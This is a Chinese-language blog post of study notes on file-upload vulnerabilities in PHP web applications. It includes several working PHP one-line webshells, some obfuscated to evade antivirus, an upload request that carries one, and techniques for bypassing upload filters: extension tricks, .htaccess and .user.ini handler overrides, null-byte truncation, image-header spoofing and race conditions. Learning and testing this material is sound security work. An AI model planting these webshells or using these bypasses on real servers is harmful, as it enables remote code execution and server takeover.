

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/fluid.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="KGYSaikou">
  <meta name="keywords" content="">
  
    <meta name="description" content="PHP的工作流程 当用户访问PHP文件时会发送一个HTTP请求,并将请求传送到WEB服务器. WEB服务器接受请求,根据后缀判断是PHP请求,随后WEB服务器调出用户访问的PHP文件发送给PHP引擎程序. PHP引擎程序对WEB服务发送过来的文件从头到尾进行扫描并根据PHP代码从后台读取、处理数据并动态地生成相应的HTML页面. PHP引擎将生成HTML页面返回给WEB服务器。WEB服务器再将HT">
<meta property="og:type" content="article">
<meta property="og:title" content="文件上传学习笔记">
<meta property="og:url" content="https://www.kaguyasaikou.info/2022/07/07/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/index.html">
<meta property="og:site_name" content="Noob&#39;s Blog">
<meta property="og:description" content="PHP的工作流程 当用户访问PHP文件时会发送一个HTTP请求,并将请求传送到WEB服务器. WEB服务器接受请求,根据后缀判断是PHP请求,随后WEB服务器调出用户访问的PHP文件发送给PHP引擎程序. PHP引擎程序对WEB服务发送过来的文件从头到尾进行扫描并根据PHP代码从后台读取、处理数据并动态地生成相应的HTML页面. PHP引擎将生成HTML页面返回给WEB服务器。WEB服务器再将HT">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2022-07-07T02:34:30.642Z">
<meta property="article:modified_time" content="2022-09-30T16:50:49.061Z">
<meta property="article:author" content="KGYSaikou">
<meta name="twitter:card" content="summary_large_image">
  
  
  
  <title>文件上传学习笔记 - Noob&#39;s Blog</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"www.kaguyasaikou.info","root":"/","version":"1.9.3","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>KGYSaikou</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              &nbsp;<i class="iconfont icon-search"></i>&nbsp;
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="文件上传学习笔记"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2022-07-07 10:34" pubdate>
          2022年7月7日 上午
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          2.8k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          24 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">文件上传学习笔记</h1>
            
            
              <div class="markdown-body">
                
                <h2 id="PHP的工作流程"><a href="#PHP的工作流程" class="headerlink" title="PHP的工作流程"></a>PHP的工作流程</h2><ol>
<li>当用户访问PHP文件时会发送一个HTTP请求,并将请求传送到WEB服务器.</li>
<li>WEB服务器接受请求,根据后缀判断是PHP请求,随后WEB服务器调出用户访问的PHP文件发送给PHP引擎程序.</li>
<li>PHP引擎程序对WEB服务发送过来的文件从头到尾进行扫描并根据PHP代码从后台读取、处理数据并动态地生成相应的HTML页面.</li>
<li>PHP引擎将生成HTML页面返回给WEB服务器。WEB服务器再将HTML页面返回给客户端浏览器.</li>
</ol>
<h2 id="一句话木马"><a href="#一句话木马" class="headerlink" title="一句话木马"></a>一句话木马</h2><p>一句话木马本质是一个PHP文件,其文件内容中含有可执行远程端发送的字符串的PHP代码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs PHP"><span class="hljs-meta">&lt;?php</span><br>	<span class="hljs-variable">$a</span>=<span class="hljs-variable">$_POST</span>[<span class="hljs-string">&#x27;cmd&#x27;</span>];<br>	<span class="hljs-keyword">eval</span>(<span class="hljs-variable">$a</span>);<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p>控制者可以通过HTTP POST请求发送恶意的字符串,服务端接收到这个字符串以后会将它当作PHP代码执行</p>
<p>有时为了避免一句话木马被杀毒软件干掉,会改变写法,但最终的目的都是一样的</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs PHP"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-keyword">if</span>(<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$_POST</span>[<span class="hljs-string">&#x27;cmd&#x27;</span>]))&#123;<br>	<span class="hljs-variable">$a</span> = @<span class="hljs-variable">$_POST</span>[<span class="hljs-string">&#x27;cmd&#x27;</span>];<br>	<span class="hljs-variable">$b</span> = <span class="hljs-string">&#x27;eval&#x27;</span><br>	@<span class="hljs-variable">$b</span>(<span class="hljs-variable">$a</span>);<br>&#125;<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs PHP"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">post</span>(<span class="hljs-params"></span>)</span>&#123;<br>	<span class="hljs-keyword">return</span> @<span class="hljs-variable">$_POST</span>[<span class="hljs-string">&#x27;cmd&#x27;</span>];<br>&#125;<br>	@<span class="hljs-keyword">eval</span>(<span class="hljs-title function_ invoke__">post</span>());<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs PHP"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-variable">$a</span>=<span class="hljs-string">&#x27;ev&#x27;</span>;<br><span class="hljs-variable">$b</span>=<span class="hljs-string">&#x27;al&#x27;</span>;<br><span class="hljs-variable">$funcName</span>=<span class="hljs-variable">$a</span>.<span class="hljs-variable">$b</span><br><span class="hljs-variable">$x</span>=<span class="hljs-string">&#x27;funcName&#x27;</span>;<br><span class="hljs-variable">$c</span>=<span class="hljs-string">&#x27;cmd&#x27;</span><br><span class="hljs-variable">$d</span>=@<span class="hljs-variable">$_POST</span>[<span class="hljs-variable">$c</span>]<br><span class="hljs-variable">$$x</span>(<span class="hljs-variable">$d</span>);<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p>以上代码的最终目的都是执行通过POST变量cmd传来的字符串</p>
<h2 id="文件上传常见过滤"><a href="#文件上传常见过滤" class="headerlink" title="文件上传常见过滤"></a>文件上传常见过滤</h2><h3 id="无过滤"><a href="#无过滤" class="headerlink" title="无过滤"></a>无过滤</h3><p>服务端对上传的文件没有任何验证,可以直接上传一句话木马</p>
<h3 id="前端过滤"><a href="#前端过滤" class="headerlink" title="前端过滤"></a>前端过滤</h3><p>服务端对上传的文件没有任何验证,仅在前端使用JS对上传的文件进行限制</p>
<p>由于前端的页面是用户可控的,所以可以采用禁用JS的方式绕过</p>
<p><strong>在浏览器的”开发者工具-&gt;设置-&gt;偏好设置-&gt;调试器”中选择禁用JavaScript即可禁用文件的校验</strong></p>
<p><strong>同时,因为前端过滤是在发送数据包之前,所以可以通过先上传正常文件,再在请求包中修改文件后缀名和文件内容</strong></p>
<h3 id="MIME验证"><a href="#MIME验证" class="headerlink" title="MIME验证"></a>MIME验证</h3><p>服务端对上传文件的”Content-Type”进行验证,例如:</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs HTTP">------WebKitFormBoundaryIPEWZ8YxiIJILNsM<br><span class="hljs-attribute">Content-Disposition</span><span class="hljs-punctuation">: </span>form-data; name=&quot;upload_file&quot;; filename=&quot;normal.php&quot;<br><span class="hljs-attribute">Content-Type</span><span class="hljs-punctuation">: </span>application/octet-stream<br><br>&lt;?php<br>	$a = @$_POST[&#x27;cmd&#x27;];<br>	@eval($a);<br>?&gt;<br>------WebKitFormBoundaryIPEWZ8YxiIJILNsM<br></code></pre></td></tr></table></figure>

<p>该文件<code>Content-Type</code>为<code>application/octet-stream</code></p>
<p>可以将其改成合适的MIME类型来绕过验证,例如</p>
<p><code>image/png</code>、<code>image/jpeg</code>、<code>image/gif</code>等</p>
<h3 id="文件后缀名黑名单验证"><a href="#文件后缀名黑名单验证" class="headerlink" title="文件后缀名黑名单验证"></a>文件后缀名黑名单验证</h3><ul>
<li><p>使用<code>str_replace()</code>&#x2F;<code>str_ireplace()</code>函数将黑名单内的字符串替换为空</p>
<p>该函数只进行一次替换,可以将后缀名双写来绕过</p>
<p>​		如<code>.php -&gt; .pphphp</code>在一次替换后,.pphphp中的php替换为空,后缀名变为.php</p>
</li>
<li><p>使用<code>in_array()</code>等函数检测后缀名是否在黑名单内</p>
<p>该函数区分大小写,且要求完全一致,可以使用大小写混合的方式绕过,或使用解析漏洞绕过</p>
<p>​		如<code>.php -&gt; .Php</code></p>
</li>
<li><p>使用<code>preg_match</code>函数对黑名单内的字符串进行匹配</p>
</li>
<li><p>存在解析漏洞:</p>
<hr>
<p>Windows系统不区分大小写</p>
<hr>
<p>IIS</p>
<p>​	默认将<code>xx.asp/</code>目录下的所有文件都当做<code>.asp</code>文件解析</p>
<p>​	默认不解析分号后的内容,例如会将<code>xx.asp;.jpg</code>解析为<code>.asp</code>文件</p>
<p>​	默认可执行文件后缀名有:<code>.asp/.asa/.cer/.cdx</code></p>
<hr>
<p>Apache </p>
<p>​	如果文件存在多个后缀名,Apache会从右往左解析,直到解析到可识别的文件后缀,如<code>xx.html.asd.jkl</code>会被解析为<code>html</code>文件</p>
<p>​	会将<code>php/pht/phtml/php3/php4/php5/</code>解析为php文件</p>
<p>​	如果Apache配置文件中<code>AllowOverride</code>的值为<code>All</code>并且加载<code>mod_Rewrite</code>模块,则可以通过<code>.htaccess</code>文件修改MIME类型</p>
<p>​		<code>AddType application/x-httpd-php .jpg //将.jpg后缀的文件解析为php文件</code></p>
<p>​		<code>&lt;FilesMatch &quot;shell.jpg&quot;&gt; SetHandler application/x-httpd-php &lt;/FilesMatch&gt; //将shell.jpg解析为php文件</code></p>
<hr>
</li>
</ul>
<p>​		PHP</p>
<p>​		当上传目录下有php文件且服务器使用CGI&#x2F;FastCGI模式时,可上传<code>.user.ini</code></p>
<p>​		可以使用<code>auto_prepend_file/auto_append_file</code>两个配置上传目录下所有php文件加入指定文件的内容</p>
<p>​		<code>auto_prepend_file=a.jpg //向当前目录下所有php文件开头加入a.jpg中的内容</code>	</p>
<p>​		<code>auto_prepend_file=a.jpg //向当前目录下所有php文件末尾加入a.jpg中的内容</code></p>
<h3 id="文件后缀名白名单验证"><a href="#文件后缀名白名单验证" class="headerlink" title="文件后缀名白名单验证"></a>文件后缀名白名单验证</h3><p>​	只允许白名单内的后缀名文件上传</p>
<p>​	一般使用%00截断&#x2F;0x00截断</p>
<h3 id="文件内容验证"><a href="#文件内容验证" class="headerlink" title="文件内容验证"></a>文件内容验证</h3><p><code>&lt;?</code>验证: 可使用<code>&lt;script language=&quot;php&quot;&gt; ...;...;  &lt;/script&gt;</code>来代替<code>&lt;?php ...;...;   ?&gt;</code></p>
<p><code>php</code>验证: 可使用短标签<code>&lt;?= ?&gt;</code>代替<code>&lt;?php ?&gt;</code></p>
<h3 id="文件头验证"><a href="#文件头验证" class="headerlink" title="文件头验证"></a>文件头验证</h3><p>使用图片马绕过或在一句话木马开头加上文件头</p>
<p>常见图片格式文件头:</p>
<p>GIF:<code>47 49 46 38 39 61</code><br>PNG:<code>89 50 4E 47 0D 0A 1A 0A</code><br>JPG:<code>FF D8 FF E0 00 10 4A 46 49 46</code></p>
<h3 id="二次渲染"><a href="#二次渲染" class="headerlink" title="二次渲染"></a>二次渲染</h3><p>服务端将上传的图片压缩或重新生成,导致一句话木马代码消失</p>
<p>可以上传一张正常的图片,比较原图片和渲染后的图片没有变化的部分,然后将一句话木马代码写在不变化的位置</p>
<h3 id="条件竞争"><a href="#条件竞争" class="headerlink" title="条件竞争"></a>条件竞争</h3><p>服务器在文件上传后再进行校验,如果是非法文件则删除,则可上传一个生成一句话木马的PHP文件,然后不断访问该文件,只要在服务器删除该文件前访问到该文件即可生成一句话木马</p>
<p>&#x2F;&#x2F;TODO</p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>文件上传学习笔记</div>
      <div>https://www.kaguyasaikou.info/2022/07/07/文件上传/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>KGYSaikou</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2022年7月7日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2022/07/13/WebSocket%E5%AD%A6%E4%B9%A0%E8%AE%B0%E5%BD%95/" title="WebSocket学习笔记">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">WebSocket学习笔记</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2022/06/28/SQL%E6%B3%A8%E5%85%A5/" title="SQL注入">
                        <span class="hidden-mobile">SQL注入</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.0/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.18.2/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
